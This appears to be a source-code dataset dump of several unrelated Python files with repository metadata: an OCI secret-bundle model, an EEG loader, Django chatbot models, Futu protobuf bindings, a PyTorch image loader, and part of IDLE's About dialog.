return self._content
@content.setter
def content(self, content):
"""
Sets the content of this Base64SecretBundleContentDetails.
The base64-encoded content of the secret.
:param content: The content of this Base64SecretBundleContentDetails.
:type: str
"""
self._content = content
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 34.012346
| 245
| 0.675136
|
from .secret_bundle_content_details import SecretBundleContentDetails
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class Base64SecretBundleContentDetails(SecretBundleContentDetails):
def __init__(self, **kwargs):
self.swagger_types = {
'content_type': 'str',
'content': 'str'
}
self.attribute_map = {
'content_type': 'contentType',
'content': 'content'
}
self._content_type = None
self._content = None
self._content_type = 'BASE64'
@property
def content(self):
return self._content
@content.setter
def content(self, content):
self._content = content
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true
| true
|
1c3eb839a1a83e35d187d725833190d3a81fc9c5
| 1,049
|
py
|
Python
|
PR_BCI_team/Team_StarLab/YJKim/shallow_cnn_with_mne/gigadata2.py
|
PatternRecognition/OpenBMI
|
d9291ddb81f4319fb3764d7192e0363939a62ee9
|
[
"MIT"
] | 217
|
2015-11-02T11:10:29.000Z
|
2022-03-22T07:01:12.000Z
|
PR_BCI_team/Team_StarLab/YJKim/shallow_cnn_with_mne/gigadata2.py
|
deep-bci-g/OpenBMI
|
75daf901b2dbe215852cbff243606dcfcd10f05c
|
[
"MIT"
] | 24
|
2015-11-02T11:10:45.000Z
|
2021-09-08T11:10:33.000Z
|
PR_BCI_team/Team_StarLab/YJKim/shallow_cnn_with_mne/gigadata2.py
|
deep-bci-g/OpenBMI
|
75daf901b2dbe215852cbff243606dcfcd10f05c
|
[
"MIT"
] | 112
|
2016-01-22T01:45:44.000Z
|
2022-03-22T07:08:19.000Z
|
import scipy.io as sio
import numpy as np
import mne
def load_gigadata(MI, variable_names, plot=False):
temp = MI[variable_names]
sfreq = 1000 # Sampling frequency
chan = temp.chan.tolist()
# 채널정보 추가해야함
info = mne.create_info(ch_names=chan, sfreq=sfreq, ch_types='eeg')
t = np.hstack((temp.t.reshape(100, 1), np.zeros((100, 1))))
y_label = temp.y_dec.reshape(100, 1)
events = np.hstack((t, y_label)).astype('int')
raw = mne.io.RawArray(temp.x.T, info)
if plot == True:
scalings = 'auto' # Could also pass a dictionary with some value == 'auto'
raw.plot(n_channels=62, scalings=scalings, title='Auto-scaled Data from arrays',
show=True, block=True)
return raw, events
def gigadata_epochs(raw,events,tmin=-1,tmax=3,plot=False):
epochs = mne.Epochs(raw, events=events, event_id=[1, 2], tmin=tmin,
tmax=tmax, baseline=None, verbose=True, preload=True)
if plot == True:
epochs.plot(scalings='auto', block=True)
return epochs
| 33.83871
| 88
| 0.64347
|
import scipy.io as sio
import numpy as np
import mne
def load_gigadata(MI, variable_names, plot=False):
temp = MI[variable_names]
sfreq = 1000
chan = temp.chan.tolist()
info = mne.create_info(ch_names=chan, sfreq=sfreq, ch_types='eeg')
t = np.hstack((temp.t.reshape(100, 1), np.zeros((100, 1))))
y_label = temp.y_dec.reshape(100, 1)
events = np.hstack((t, y_label)).astype('int')
raw = mne.io.RawArray(temp.x.T, info)
if plot == True:
scalings = 'auto'
raw.plot(n_channels=62, scalings=scalings, title='Auto-scaled Data from arrays',
show=True, block=True)
return raw, events
def gigadata_epochs(raw,events,tmin=-1,tmax=3,plot=False):
epochs = mne.Epochs(raw, events=events, event_id=[1, 2], tmin=tmin,
tmax=tmax, baseline=None, verbose=True, preload=True)
if plot == True:
epochs.plot(scalings='auto', block=True)
return epochs
| true
| true
|
1c3eb889ab3a9e447cb4b4e471bb818daaf9273e
| 1,510
|
py
|
Python
|
chatbot_tutorial/models.py
|
Jishin4477/Djangobot
|
41eda19b683224dcf2efdb80dd178aa03e7bad82
|
[
"MIT"
] | null | null | null |
chatbot_tutorial/models.py
|
Jishin4477/Djangobot
|
41eda19b683224dcf2efdb80dd178aa03e7bad82
|
[
"MIT"
] | null | null | null |
chatbot_tutorial/models.py
|
Jishin4477/Djangobot
|
41eda19b683224dcf2efdb80dd178aa03e7bad82
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
from chatbot_tutorial._threading_local import local
def set_current_user(user):
_thread_locals.user = user
def get_current_user():
return getattr(_thread_locals, 'user', None)
class DateTimeBase(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
created_by = models.CharField(max_length=100, default="", editable=False)
updated_by = models.CharField(max_length=100, default="", editable=False)
class Meta:
abstract = True
def save(self, *args, **kwargs):
try:
if get_current_user():
if self.created_by == "":
self.created_by = get_current_user().username
self.updated_by = get_current_user().username
except Exception as e:
print("error")
super(DateTimeBase, self).save(*args, **kwargs)
class AllCalls(DateTimeBase):
user = models.ForeignKey(User, null=True, blank=True)
entered_val = models.CharField(max_length=50, null=True, blank=True)
message = models.CharField(max_length=200, null=True, blank=True)
def __str__(self):
return u'%s' %(self.entered_val)
class GetUser(DateTimeBase):
user = models.ForeignKey(User, null=True, blank=True, default=None)
date = models.DateTimeField(default=None, null=True, blank=True)
def __str__(self):
return u'%s' %(self.user)
| 29.607843
| 77
| 0.676821
|
from django.db import models
from django.contrib.auth.models import User
from chatbot_tutorial._threading_local import local
def set_current_user(user):
_thread_locals.user = user
def get_current_user():
return getattr(_thread_locals, 'user', None)
class DateTimeBase(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
created_by = models.CharField(max_length=100, default="", editable=False)
updated_by = models.CharField(max_length=100, default="", editable=False)
class Meta:
abstract = True
def save(self, *args, **kwargs):
try:
if get_current_user():
if self.created_by == "":
self.created_by = get_current_user().username
self.updated_by = get_current_user().username
except Exception as e:
print("error")
super(DateTimeBase, self).save(*args, **kwargs)
class AllCalls(DateTimeBase):
user = models.ForeignKey(User, null=True, blank=True)
entered_val = models.CharField(max_length=50, null=True, blank=True)
message = models.CharField(max_length=200, null=True, blank=True)
def __str__(self):
return u'%s' %(self.entered_val)
class GetUser(DateTimeBase):
user = models.ForeignKey(User, null=True, blank=True, default=None)
date = models.DateTimeField(default=None, null=True, blank=True)
def __str__(self):
return u'%s' %(self.user)
| true
| true
|
1c3eb8a0eae5f3799e563e32e38c6313e70f3209
| 8,763
|
py
|
Python
|
futu/common/pb/Qot_GetRehab_pb2.py
|
liteself/py-futu-api
|
a78f5b46f56d30fb82a42951823afea4b5ed1307
|
[
"Apache-2.0"
] | 2
|
2020-03-18T09:54:03.000Z
|
2020-05-15T08:13:33.000Z
|
futu/common/pb/Qot_GetRehab_pb2.py
|
liteself/py-futu-api
|
a78f5b46f56d30fb82a42951823afea4b5ed1307
|
[
"Apache-2.0"
] | 1
|
2020-04-21T02:42:32.000Z
|
2020-04-21T02:42:32.000Z
|
futu/common/pb/Qot_GetRehab_pb2.py
|
liteself/py-futu-api
|
a78f5b46f56d30fb82a42951823afea4b5ed1307
|
[
"Apache-2.0"
] | 1
|
2021-02-17T17:46:36.000Z
|
2021-02-17T17:46:36.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: Qot_GetRehab.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import Common_pb2 as Common__pb2
import Qot_Common_pb2 as Qot__Common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='Qot_GetRehab.proto',
package='Qot_GetRehab',
syntax='proto2',
serialized_pb=_b('\n\x12Qot_GetRehab.proto\x12\x0cQot_GetRehab\x1a\x0c\x43ommon.proto\x1a\x10Qot_Common.proto\"1\n\x03\x43\x32S\x12*\n\x0csecurityList\x18\x01 \x03(\x0b\x32\x14.Qot_Common.Security\"]\n\rSecurityRehab\x12&\n\x08security\x18\x01 \x02(\x0b\x32\x14.Qot_Common.Security\x12$\n\trehabList\x18\x02 \x03(\x0b\x32\x11.Qot_Common.Rehab\"=\n\x03S2C\x12\x36\n\x11securityRehabList\x18\x01 \x03(\x0b\x32\x1b.Qot_GetRehab.SecurityRehab\")\n\x07Request\x12\x1e\n\x03\x63\x32s\x18\x01 \x02(\x0b\x32\x11.Qot_GetRehab.C2S\"b\n\x08Response\x12\x15\n\x07retType\x18\x01 \x02(\x05:\x04-400\x12\x0e\n\x06retMsg\x18\x02 \x01(\t\x12\x0f\n\x07\x65rrCode\x18\x03 \x01(\x05\x12\x1e\n\x03s2c\x18\x04 \x01(\x0b\x32\x11.Qot_GetRehab.S2CB\x15\n\x13\x63om.futu.openapi.pb')
,
dependencies=[Common__pb2.DESCRIPTOR,Qot__Common__pb2.DESCRIPTOR,])
_C2S = _descriptor.Descriptor(
name='C2S',
full_name='Qot_GetRehab.C2S',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='securityList', full_name='Qot_GetRehab.C2S.securityList', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=68,
serialized_end=117,
)
_SECURITYREHAB = _descriptor.Descriptor(
name='SecurityRehab',
full_name='Qot_GetRehab.SecurityRehab',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='security', full_name='Qot_GetRehab.SecurityRehab.security', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='rehabList', full_name='Qot_GetRehab.SecurityRehab.rehabList', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=119,
serialized_end=212,
)
_S2C = _descriptor.Descriptor(
name='S2C',
full_name='Qot_GetRehab.S2C',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='securityRehabList', full_name='Qot_GetRehab.S2C.securityRehabList', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=214,
serialized_end=275,
)
_REQUEST = _descriptor.Descriptor(
name='Request',
full_name='Qot_GetRehab.Request',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='c2s', full_name='Qot_GetRehab.Request.c2s', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=277,
serialized_end=318,
)
_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='Qot_GetRehab.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='retType', full_name='Qot_GetRehab.Response.retType', index=0,
number=1, type=5, cpp_type=1, label=2,
has_default_value=True, default_value=-400,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='retMsg', full_name='Qot_GetRehab.Response.retMsg', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='errCode', full_name='Qot_GetRehab.Response.errCode', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='s2c', full_name='Qot_GetRehab.Response.s2c', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=320,
serialized_end=418,
)
_C2S.fields_by_name['securityList'].message_type = Qot__Common__pb2._SECURITY
_SECURITYREHAB.fields_by_name['security'].message_type = Qot__Common__pb2._SECURITY
_SECURITYREHAB.fields_by_name['rehabList'].message_type = Qot__Common__pb2._REHAB
_S2C.fields_by_name['securityRehabList'].message_type = _SECURITYREHAB
_REQUEST.fields_by_name['c2s'].message_type = _C2S
_RESPONSE.fields_by_name['s2c'].message_type = _S2C
DESCRIPTOR.message_types_by_name['C2S'] = _C2S
DESCRIPTOR.message_types_by_name['SecurityRehab'] = _SECURITYREHAB
DESCRIPTOR.message_types_by_name['S2C'] = _S2C
DESCRIPTOR.message_types_by_name['Request'] = _REQUEST
DESCRIPTOR.message_types_by_name['Response'] = _RESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
C2S = _reflection.GeneratedProtocolMessageType('C2S', (_message.Message,), dict(
DESCRIPTOR = _C2S,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.C2S)
))
_sym_db.RegisterMessage(C2S)
SecurityRehab = _reflection.GeneratedProtocolMessageType('SecurityRehab', (_message.Message,), dict(
DESCRIPTOR = _SECURITYREHAB,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.SecurityRehab)
))
_sym_db.RegisterMessage(SecurityRehab)
S2C = _reflection.GeneratedProtocolMessageType('S2C', (_message.Message,), dict(
DESCRIPTOR = _S2C,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.S2C)
))
_sym_db.RegisterMessage(S2C)
Request = _reflection.GeneratedProtocolMessageType('Request', (_message.Message,), dict(
DESCRIPTOR = _REQUEST,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.Request)
))
_sym_db.RegisterMessage(Request)
Response = _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), dict(
DESCRIPTOR = _RESPONSE,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.Response)
))
_sym_db.RegisterMessage(Response)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\023com.futu.openapi.pb'))
# @@protoc_insertion_point(module_scope)
| 33.067925
| 760
| 0.744266
|
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
_sym_db = _symbol_database.Default()
import Common_pb2 as Common__pb2
import Qot_Common_pb2 as Qot__Common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='Qot_GetRehab.proto',
package='Qot_GetRehab',
syntax='proto2',
serialized_pb=_b('\n\x12Qot_GetRehab.proto\x12\x0cQot_GetRehab\x1a\x0c\x43ommon.proto\x1a\x10Qot_Common.proto\"1\n\x03\x43\x32S\x12*\n\x0csecurityList\x18\x01 \x03(\x0b\x32\x14.Qot_Common.Security\"]\n\rSecurityRehab\x12&\n\x08security\x18\x01 \x02(\x0b\x32\x14.Qot_Common.Security\x12$\n\trehabList\x18\x02 \x03(\x0b\x32\x11.Qot_Common.Rehab\"=\n\x03S2C\x12\x36\n\x11securityRehabList\x18\x01 \x03(\x0b\x32\x1b.Qot_GetRehab.SecurityRehab\")\n\x07Request\x12\x1e\n\x03\x63\x32s\x18\x01 \x02(\x0b\x32\x11.Qot_GetRehab.C2S\"b\n\x08Response\x12\x15\n\x07retType\x18\x01 \x02(\x05:\x04-400\x12\x0e\n\x06retMsg\x18\x02 \x01(\t\x12\x0f\n\x07\x65rrCode\x18\x03 \x01(\x05\x12\x1e\n\x03s2c\x18\x04 \x01(\x0b\x32\x11.Qot_GetRehab.S2CB\x15\n\x13\x63om.futu.openapi.pb')
,
dependencies=[Common__pb2.DESCRIPTOR,Qot__Common__pb2.DESCRIPTOR,])
_C2S = _descriptor.Descriptor(
name='C2S',
full_name='Qot_GetRehab.C2S',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='securityList', full_name='Qot_GetRehab.C2S.securityList', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=68,
serialized_end=117,
)
_SECURITYREHAB = _descriptor.Descriptor(
name='SecurityRehab',
full_name='Qot_GetRehab.SecurityRehab',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='security', full_name='Qot_GetRehab.SecurityRehab.security', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='rehabList', full_name='Qot_GetRehab.SecurityRehab.rehabList', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=119,
serialized_end=212,
)
_S2C = _descriptor.Descriptor(
name='S2C',
full_name='Qot_GetRehab.S2C',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='securityRehabList', full_name='Qot_GetRehab.S2C.securityRehabList', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=214,
serialized_end=275,
)
_REQUEST = _descriptor.Descriptor(
name='Request',
full_name='Qot_GetRehab.Request',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='c2s', full_name='Qot_GetRehab.Request.c2s', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=277,
serialized_end=318,
)
_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='Qot_GetRehab.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='retType', full_name='Qot_GetRehab.Response.retType', index=0,
number=1, type=5, cpp_type=1, label=2,
has_default_value=True, default_value=-400,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='retMsg', full_name='Qot_GetRehab.Response.retMsg', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='errCode', full_name='Qot_GetRehab.Response.errCode', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='s2c', full_name='Qot_GetRehab.Response.s2c', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=320,
serialized_end=418,
)
_C2S.fields_by_name['securityList'].message_type = Qot__Common__pb2._SECURITY
_SECURITYREHAB.fields_by_name['security'].message_type = Qot__Common__pb2._SECURITY
_SECURITYREHAB.fields_by_name['rehabList'].message_type = Qot__Common__pb2._REHAB
_S2C.fields_by_name['securityRehabList'].message_type = _SECURITYREHAB
_REQUEST.fields_by_name['c2s'].message_type = _C2S
_RESPONSE.fields_by_name['s2c'].message_type = _S2C
DESCRIPTOR.message_types_by_name['C2S'] = _C2S
DESCRIPTOR.message_types_by_name['SecurityRehab'] = _SECURITYREHAB
DESCRIPTOR.message_types_by_name['S2C'] = _S2C
DESCRIPTOR.message_types_by_name['Request'] = _REQUEST
DESCRIPTOR.message_types_by_name['Response'] = _RESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
C2S = _reflection.GeneratedProtocolMessageType('C2S', (_message.Message,), dict(
DESCRIPTOR = _C2S,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.C2S)
))
_sym_db.RegisterMessage(C2S)
SecurityRehab = _reflection.GeneratedProtocolMessageType('SecurityRehab', (_message.Message,), dict(
DESCRIPTOR = _SECURITYREHAB,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.SecurityRehab)
))
_sym_db.RegisterMessage(SecurityRehab)
S2C = _reflection.GeneratedProtocolMessageType('S2C', (_message.Message,), dict(
DESCRIPTOR = _S2C,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.S2C)
))
_sym_db.RegisterMessage(S2C)
Request = _reflection.GeneratedProtocolMessageType('Request', (_message.Message,), dict(
DESCRIPTOR = _REQUEST,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.Request)
))
_sym_db.RegisterMessage(Request)
Response = _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), dict(
DESCRIPTOR = _RESPONSE,
__module__ = 'Qot_GetRehab_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetRehab.Response)
))
_sym_db.RegisterMessage(Response)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\023com.futu.openapi.pb'))
# @@protoc_insertion_point(module_scope)
| true
| true
|
1c3eb8ac4bfe8c177995657ed6dd4e2736b430c7
| 1,896
|
py
|
Python
|
data/image_folder.py
|
matsumototo180/pytorch-CycleGAN-and-pix2pix-music
|
e9b39a51226c3ea67e3463df5218ff4beca8c7f7
|
[
"BSD-3-Clause"
] | null | null | null |
data/image_folder.py
|
matsumototo180/pytorch-CycleGAN-and-pix2pix-music
|
e9b39a51226c3ea67e3463df5218ff4beca8c7f7
|
[
"BSD-3-Clause"
] | null | null | null |
data/image_folder.py
|
matsumototo180/pytorch-CycleGAN-and-pix2pix-music
|
e9b39a51226c3ea67e3463df5218ff4beca8c7f7
|
[
"BSD-3-Clause"
] | null | null | null |
"""A modified image folder class
We modify the official PyTorch image folder (https://github.com/pytorch/vision/blob/master/torchvision/datasets/folder.py)
so that this class can load images from both current directory and its subdirectories.
"""
import torch.utils.data as data
from PIL import Image
import os
IMG_EXTENSIONS = [
'.jpg', '.JPG', '.jpeg', '.JPEG',
'.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',
'.tif', '.TIF', '.tiff', '.TIFF',
'.npy'
]
def is_image_file(filename):
return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)
def make_dataset(dir, max_dataset_size=float("inf")):
images = []
assert os.path.isdir(dir), '%s is not a valid directory' % dir
for root, _, fnames in sorted(os.walk(dir)):
for fname in fnames:
if is_image_file(fname):
path = os.path.join(root, fname)
images.append(path)
return images[:min(max_dataset_size, len(images))]
def default_loader(path):
return Image.open(path).convert('RGB')
class ImageFolder(data.Dataset):
def __init__(self, root, transform=None, return_paths=False,
loader=default_loader):
imgs = make_dataset(root)
if len(imgs) == 0:
raise(RuntimeError("Found 0 images in: " + root + "\n"
"Supported image extensions are: " + ",".join(IMG_EXTENSIONS)))
self.root = root
self.imgs = imgs
self.transform = transform
self.return_paths = return_paths
self.loader = loader
def __getitem__(self, index):
path = self.imgs[index]
img = self.loader(path)
if self.transform is not None:
img = self.transform(img)
if self.return_paths:
return img, path
else:
return img
def __len__(self):
return len(self.imgs)
| 28.298507
| 122
| 0.611287
|
import torch.utils.data as data
from PIL import Image
import os
IMG_EXTENSIONS = [
'.jpg', '.JPG', '.jpeg', '.JPEG',
'.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',
'.tif', '.TIF', '.tiff', '.TIFF',
'.npy'
]
def is_image_file(filename):
return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)
def make_dataset(dir, max_dataset_size=float("inf")):
images = []
assert os.path.isdir(dir), '%s is not a valid directory' % dir
for root, _, fnames in sorted(os.walk(dir)):
for fname in fnames:
if is_image_file(fname):
path = os.path.join(root, fname)
images.append(path)
return images[:min(max_dataset_size, len(images))]
def default_loader(path):
return Image.open(path).convert('RGB')
class ImageFolder(data.Dataset):
def __init__(self, root, transform=None, return_paths=False,
loader=default_loader):
imgs = make_dataset(root)
if len(imgs) == 0:
raise(RuntimeError("Found 0 images in: " + root + "\n"
"Supported image extensions are: " + ",".join(IMG_EXTENSIONS)))
self.root = root
self.imgs = imgs
self.transform = transform
self.return_paths = return_paths
self.loader = loader
def __getitem__(self, index):
path = self.imgs[index]
img = self.loader(path)
if self.transform is not None:
img = self.transform(img)
if self.return_paths:
return img, path
else:
return img
def __len__(self):
return len(self.imgs)
| true
| true
|
1c3eba13da06e644c32c86598cdc0ded3557d779
| 6,680
|
py
|
Python
|
Lib/idlelib/aboutDialog.py
|
rbuzatu90/hyperv-python
|
82bf5a72b4d956ea05affe1644b47e378dec0f4e
|
[
"bzip2-1.0.6"
] | 69
|
2015-12-28T07:02:51.000Z
|
2022-03-31T13:36:42.000Z
|
Lib/idlelib/aboutDialog.py
|
rbuzatu90/hyperv-python
|
82bf5a72b4d956ea05affe1644b47e378dec0f4e
|
[
"bzip2-1.0.6"
] | 23
|
2016-03-04T10:43:24.000Z
|
2021-03-17T09:58:19.000Z
|
Lib/idlelib/aboutDialog.py
|
rbuzatu90/hyperv-python
|
82bf5a72b4d956ea05affe1644b47e378dec0f4e
|
[
"bzip2-1.0.6"
] | 24
|
2016-02-29T11:45:47.000Z
|
2021-12-24T08:41:37.000Z
|
"""About Dialog for IDLE
"""
from Tkinter import *
import os
from idlelib import textView
from idlelib import idlever
class AboutDialog(Toplevel):
"""Modal about dialog for idle
"""
def __init__(self, parent, title, _htest=False):
"""
_htest - bool, change box location when running htest
"""
Toplevel.__init__(self, parent)
self.configure(borderwidth=5)
# place dialog below parent if running htest
self.geometry("+%d+%d" % (
parent.winfo_rootx()+30,
parent.winfo_rooty()+(30 if not _htest else 100)))
self.bg = "#707070"
self.fg = "#ffffff"
self.CreateWidgets()
self.resizable(height=FALSE, width=FALSE)
self.title(title)
self.transient(parent)
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.Ok)
self.parent = parent
self.buttonOk.focus_set()
self.bind('<Return>',self.Ok) #dismiss dialog
self.bind('<Escape>',self.Ok) #dismiss dialog
self.wait_window()
def CreateWidgets(self):
frameMain = Frame(self, borderwidth=2, relief=SUNKEN)
frameButtons = Frame(self)
frameButtons.pack(side=BOTTOM, fill=X)
frameMain.pack(side=TOP, expand=TRUE, fill=BOTH)
self.buttonOk = Button(frameButtons, text='Close',
command=self.Ok)
self.buttonOk.pack(padx=5, pady=5)
#self.picture = Image('photo', data=self.pictureData)
frameBg = Frame(frameMain, bg=self.bg)
frameBg.pack(expand=TRUE, fill=BOTH)
labelTitle = Label(frameBg, text='IDLE', fg=self.fg, bg=self.bg,
font=('courier', 24, 'bold'))
labelTitle.grid(row=0, column=0, sticky=W, padx=10, pady=10)
#labelPicture = Label(frameBg, text='[picture]')
#image=self.picture, bg=self.bg)
#labelPicture.grid(row=1, column=1, sticky=W, rowspan=2,
# padx=0, pady=3)
byline = "Python's Integrated DeveLopment Environment" + 5*'\n'
labelDesc = Label(frameBg, text=byline, justify=LEFT,
fg=self.fg, bg=self.bg)
